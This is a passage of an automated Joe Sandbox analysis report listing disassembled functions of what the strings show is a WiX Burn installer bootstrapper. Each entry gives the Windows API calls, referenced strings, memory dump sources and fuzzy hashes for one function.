                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterErrorLastLeaveReleaseSemaphore
                                                                                                                                                          • String ID: Failed to enqueue action.$Failed to signal queue semaphore.$d:\a\wix\wix\src\burn\engine\externalengine.cpp
                                                                                                                                                          • API String ID: 540623443-899205991
                                                                                                                                                          • Opcode ID: 706a3e7ca5a547b1e97378c074f3b9acb4887357d8f949b3233b51ddde96fb6e
                                                                                                                                                          • Instruction ID: f2fd09616fb6bd9f5e3892c6576bf30888701e84f418e77d8c31f1a04996df27
                                                                                                                                                          • Opcode Fuzzy Hash: 706a3e7ca5a547b1e97378c074f3b9acb4887357d8f949b3233b51ddde96fb6e
                                                                                                                                                          • Instruction Fuzzy Hash: F911D532680214BBF211AA56CC4AF677B5CFB00765F114036FE09BB2E1D6A8AC4086E9
                                                                                                                                                          Function 00421A29 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 71fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(000000B0,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000,00000001,00000000,000000B0), ref: 00421A5D
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00421AEC
                                                                                                                                                          Strings
                                                                                                                                                          • -%ls=%Iu, xrefs: 00421A74, 00421AB7
                                                                                                                                                          • burn.filehandle.self, xrefs: 00421A6F, 00421AB2
                                                                                                                                                          • Failed to append the file handle to the obfuscated command line., xrefs: 00421ACD
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\core.cpp, xrefs: 00421A9C
                                                                                                                                                          • Failed to append the file handle to the command line., xrefs: 00421A8A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateFileHandle
                                                                                                                                                          • String ID: -%ls=%Iu$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self$d:\a\wix\wix\src\burn\engine\core.cpp
                                                                                                                                                          • API String ID: 3498533004-3441215842
                                                                                                                                                          • Opcode ID: bf65ee953b3228020bfc703d526d5a9aed330bb242580f8c1048ff4691c5949d
                                                                                                                                                          • Instruction ID: a19fe3b6051d07f69696f5723743eeae738f9e03c13ae13fb6f89ec37276799e
                                                                                                                                                          • Opcode Fuzzy Hash: bf65ee953b3228020bfc703d526d5a9aed330bb242580f8c1048ff4691c5949d
                                                                                                                                                          • Instruction Fuzzy Hash: 02112931B823307BDB216A599C4AF8F3E689B11B34F514623FD247A2E0E2F8495187DD
                                                                                                                                                          Function 0046CAD9 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 67libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetProcAddress.KERNEL32(PathAllocCanonicalize,api-ms-win-core-path-l1-1-0.dll), ref: 0046CB2B
                                                                                                                                                          • GetLastError.KERNEL32(?,?,0046CCF2,00000000,00000001,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046CB3A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressErrorLastProc
                                                                                                                                                          • String ID: Failed to get address of PathAllocCanonicalize.$Failed to load api-ms-win-core-path-l1-1-0.dll$PathAllocCanonicalize$api-ms-win-core-path-l1-1-0.dll$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
                                                                                                                                                          • API String ID: 199729137-3685544007
                                                                                                                                                          • Opcode ID: 36d48190f460760b8a535f19c158d8ee4e3b94312fb12559e508147d9516532a
                                                                                                                                                          • Instruction ID: c5ce89340ad5c0d4a9053544078960e67daca7dbe69b3980bce9433fae5be793
                                                                                                                                                          • Opcode Fuzzy Hash: 36d48190f460760b8a535f19c158d8ee4e3b94312fb12559e508147d9516532a
                                                                                                                                                          • Instruction Fuzzy Hash: 0C11C132F8132163D73116196CABF7B24148766F60F22026BBC54BF2D1F6AC6C4142DE
                                                                                                                                                          Function 00469037 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 65libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004018A4: LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018C0
                                                                                                                                                            • Part of subcall function 004018A4: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018D1
                                                                                                                                                          • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 00469065
                                                                                                                                                          • GetLastError.KERNEL32(?,00408A3A,00000001,?,?,004084E0,?,?,?,004095F6,?,?,?), ref: 00469074
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                          • String ID: Failed to find set restore point proc address.$Failed to initialize security for COM to talk to system restore.$SRSetRestorePointW$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\srputil.cpp$srclient.dll
                                                                                                                                                          • API String ID: 1866314245-776416089
                                                                                                                                                          • Opcode ID: 58fd1d4305e53b4b28164f2ae22ec983ee15528a396225e2f6488fc9f55d94b8
                                                                                                                                                          • Instruction ID: 59b050c8e1278325c22c386c4d7ce2ef20173f79683b9928d8a40290ef58482a
                                                                                                                                                          • Opcode Fuzzy Hash: 58fd1d4305e53b4b28164f2ae22ec983ee15528a396225e2f6488fc9f55d94b8
                                                                                                                                                          • Instruction Fuzzy Hash: 47110672BC433223D63122564C0EB2B29188B21BA5F11817BFD04BA2D2F9FD9C4081EF
                                                                                                                                                          Function 004666B4 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 55libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,00000120,00000000,?,0041244F,00000124,00000120,?,00411DBC,000004A0,000004A0,00000120,00000000,000004A0,00000000), ref: 004666C5
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004666CC
                                                                                                                                                          • GetLastError.KERNEL32(?,0041244F,00000124,00000120,?,00411DBC,000004A0,000004A0,00000120,00000000,000004A0,00000000,00000120,00000000,000004A0,00000120), ref: 004666F5
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                          • String ID: Failed to disable file system redirection.$Wow64DisableWow64FsRedirection$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\procutil.cpp$kernel32
                                                                                                                                                          • API String ID: 4275029093-79649620
                                                                                                                                                          • Opcode ID: 910e2b0dd222d7276a04c5a303c09cb22b57aaf808c61efc52cd0a84be26eb99
                                                                                                                                                          • Instruction ID: ccbcd6241107395b021444d97de2c02ebee54ccff81ce224117537f1d69362fa
                                                                                                                                                          • Opcode Fuzzy Hash: 910e2b0dd222d7276a04c5a303c09cb22b57aaf808c61efc52cd0a84be26eb99
                                                                                                                                                          • Instruction Fuzzy Hash: 640124BBA4422163D32026599C48F6B6A5C9B54B65F534177FE08FB281EA7C8C4042FE
                                                                                                                                                          Function 00467873 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004018A4: LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018C0
                                                                                                                                                            • Part of subcall function 004018A4: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018D1
                                                                                                                                                          • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 004678AF
                                                                                                                                                          • GetProcAddress.KERNEL32(RegGetValueW), ref: 004678C5
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to load AdvApi32.dll, xrefs: 00467889
                                                                                                                                                          • RegDeleteKeyExW, xrefs: 004678A4
                                                                                                                                                          • RegGetValueW, xrefs: 004678B5
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 00467895
                                                                                                                                                          • AdvApi32.dll, xrefs: 00467879
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$ErrorLastLibraryLoad
                                                                                                                                                          • String ID: AdvApi32.dll$Failed to load AdvApi32.dll$RegDeleteKeyExW$RegGetValueW$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 856020675-45934097
                                                                                                                                                          • Opcode ID: a80d23ac315bb2d27a7b8271664a7e8cc92cfd30409a87951d92937cfdb34e10
                                                                                                                                                          • Instruction ID: 83bb8739051fbf07e95143f04a91db3102ab8e9e7359723c6475a1d7fac67ef0
                                                                                                                                                          • Opcode Fuzzy Hash: a80d23ac315bb2d27a7b8271664a7e8cc92cfd30409a87951d92937cfdb34e10
                                                                                                                                                          • Instruction Fuzzy Hash: 2BF04430A483119BD7206BA4AE5EB063A51EB21756F6042BBF600762E0EFFC0854CB5D
                                                                                                                                                          Function 0041B68A Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 198COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Aborted cache verify payload signature begin.$Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$d:\a\wix\wix\src\burn\engine\cache.cpp
                                                                                                                                                          • API String ID: 0-4228632460
                                                                                                                                                          • Opcode ID: be2ff381145f8f9432216b3196ec95edb6e89968f7fc4fc3b51107e839ad74cd
                                                                                                                                                          • Instruction ID: 14fa15d9126d21d3e18692a485cb9d7e131f3ecd8f9fbb151d2d4b2d72a99d32
                                                                                                                                                          • Opcode Fuzzy Hash: be2ff381145f8f9432216b3196ec95edb6e89968f7fc4fc3b51107e839ad74cd
                                                                                                                                                          • Instruction Fuzzy Hash: 2F51C672D40219ABDB11AF95CC45BEF7AB8EF49B14F11012AF900BB281D7789D408BE9
                                                                                                                                                          Function 00476203 Relevance: 12.2, APIs: 1, Strings: 7, Instructions: 187COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID: Failed to copy host name.$Failed to copy password.$Failed to copy path.$Failed to copy query string.$Failed to copy user name.$Failed to crack URI.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\uriutil.cpp
                                                                                                                                                          • API String ID: 1452528299-3884538410
                                                                                                                                                          • Opcode ID: 4eae54ad229ff4acc9da9f7e1d251ce805e787dab74c7a201da3addd171c87c4
                                                                                                                                                          • Instruction ID: 7a944c7865f29af9b597ee3d6e2ff0980209d6bc00e121f3b31afa6f73817caa
                                                                                                                                                          • Opcode Fuzzy Hash: 4eae54ad229ff4acc9da9f7e1d251ce805e787dab74c7a201da3addd171c87c4
                                                                                                                                                          • Instruction Fuzzy Hash: EA619F71E00628ABDB319E15CC49BDE7BB9AB04744F4180EBB90CB7391D6789E84CF58
                                                                                                                                                          Function 0047241B Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 139COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(?,?,00472308,00000000,00000000,00000001), ref: 004724C4
                                                                                                                                                          • GetLastError.KERNEL32(?,?,00472308,00000000,00000000,00000001), ref: 00472526
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID: Failed to add header to HTTP request.$Failed to allocate string for resource URI.$Failed to append query strong to resource from URI.$Failed to open internet request.$\gG$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                          • API String ID: 1452528299-2906345047
                                                                                                                                                          • Opcode ID: 04d682cfe4c8a4eae045d44a0f76fad0557406208599921ca006eadf3de2bac9
                                                                                                                                                          • Instruction ID: 8b992c60f3747558705f754fed161f75e1f4096cac8b497ce9fffd506564b0f6
                                                                                                                                                          • Opcode Fuzzy Hash: 04d682cfe4c8a4eae045d44a0f76fad0557406208599921ca006eadf3de2bac9
                                                                                                                                                          • Instruction Fuzzy Hash: B1412B72A40315B7EB319E554D45FAB366C9B11BA4F11812BFD08BB291E6FCCD0096A8
                                                                                                                                                          Function 004171BB Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 126stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0040241C: CreateDirectoryW.KERNELBASE(00000000,0040951C,?,00000000,?,0041DD2E,00000000,00000000,?,version.dll,00000000,0040951C,00000000,0040960C,?,00000001), ref: 0040242A
                                                                                                                                                            • Part of subcall function 0040241C: GetLastError.KERNEL32(?,0041DD2E,00000000,00000000,?,version.dll,00000000,0040951C,00000000,0040960C,?,00000001), ref: 00402438
                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000140,00000000,00000140,00000001,00000001,00418D09,swidtag,00000140,00000001,?,00418D09,00000000,00000001,00000000), ref: 0041724A
                                                                                                                                                            • Part of subcall function 00405B5B: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000001,00000000,?,00417261,00000001,00000080,?,00000000), ref: 00405B73
                                                                                                                                                            • Part of subcall function 00405B5B: GetLastError.KERNEL32(?,00417261,00000001,00000080,?,00000000,?,00418D09,00000001,00000140,?,?,?,?,?,000000B0), ref: 00405B80
                                                                                                                                                          Strings
                                                                                                                                                          • swidtag, xrefs: 00417206
                                                                                                                                                          • Failed to allocate regid folder path., xrefs: 004172D4
                                                                                                                                                          • Failed to format tag folder path., xrefs: 004172E8
                                                                                                                                                          • Failed to write tag xml to file: %ls, xrefs: 00417288
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\registration.cpp, xrefs: 004172B1, 004172FA
                                                                                                                                                          • Failed to create regid folder: %ls, xrefs: 0041729F
                                                                                                                                                          • Failed to allocate regid file path., xrefs: 004172C0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateErrorLast$DirectoryFilelstrlen
                                                                                                                                                          • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$d:\a\wix\wix\src\burn\engine\registration.cpp$swidtag
                                                                                                                                                          • API String ID: 583680227-2075814422
                                                                                                                                                          • Opcode ID: c6101dc53d152b0299878a28330fed9d23389a4bacab5c854c54e571e56c1218
                                                                                                                                                          • Instruction ID: fc40411dcaf6a818c5974c1bb10c8e0f5e78ae98e46b975741095a7a52f9d615
                                                                                                                                                          • Opcode Fuzzy Hash: c6101dc53d152b0299878a28330fed9d23389a4bacab5c854c54e571e56c1218
                                                                                                                                                          • Instruction Fuzzy Hash: 9D410831E40619BBDB11AA44CC06FDEBB74EF44710F2181A7BA007A1E0E7B95D919B8C
                                                                                                                                                          Function 0044F94B Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 123COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,?,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0044F969
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044FAA5
                                                                                                                                                          Strings
                                                                                                                                                          • Engine is active, cannot change engine state., xrefs: 0044F981
                                                                                                                                                          • BA requested unknown payload with id: %ls, xrefs: 0044F9E1
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\externalengine.cpp, xrefs: 0044F993, 0044F9F3
                                                                                                                                                          • Failed to set source path for container., xrefs: 0044FA86
                                                                                                                                                          • Failed to set source path for payload., xrefs: 0044FA1F
                                                                                                                                                          • BA requested unknown container with id: %ls, xrefs: 0044FA5C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                          • String ID: BA requested unknown container with id: %ls$BA requested unknown payload with id: %ls$Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$d:\a\wix\wix\src\burn\engine\externalengine.cpp
                                                                                                                                                          • API String ID: 3168844106-3917755568
                                                                                                                                                          • Opcode ID: e4fff165661342e66975fcd748d803958046dbba2ee9addb462869001abb3f88
                                                                                                                                                          • Instruction ID: 8d0c078b72fa1011523eed8d44637b9e7dcc2bf75fe92f7d739fe3728925f512
                                                                                                                                                          • Opcode Fuzzy Hash: e4fff165661342e66975fcd748d803958046dbba2ee9addb462869001abb3f88
                                                                                                                                                          • Instruction Fuzzy Hash: C331D772F8021177EB219AA58C4AFDB3BA89B04B10F154137B908FB2C1E6B8D94447A9
                                                                                                                                                          Function 0046EC4C Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 116COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000004,-00000018,00000000,00000000,?,00000005,00000000), ref: 0046EC77
                                                                                                                                                            • Part of subcall function 0046EE88: EnterCriticalSection.KERNEL32(0046EC90,00000000,00000000,?,0046EC8C,00000000,?,?,?), ref: 0046EE94
                                                                                                                                                            • Part of subcall function 0046EE88: LeaveCriticalSection.KERNEL32(0046EC90,0046EC8C,?,?,?,?,0046EC8C,00000000,?,?,?), ref: 0046EECD
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000,?,00000008,00000000,?,?,?), ref: 0046ED75
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
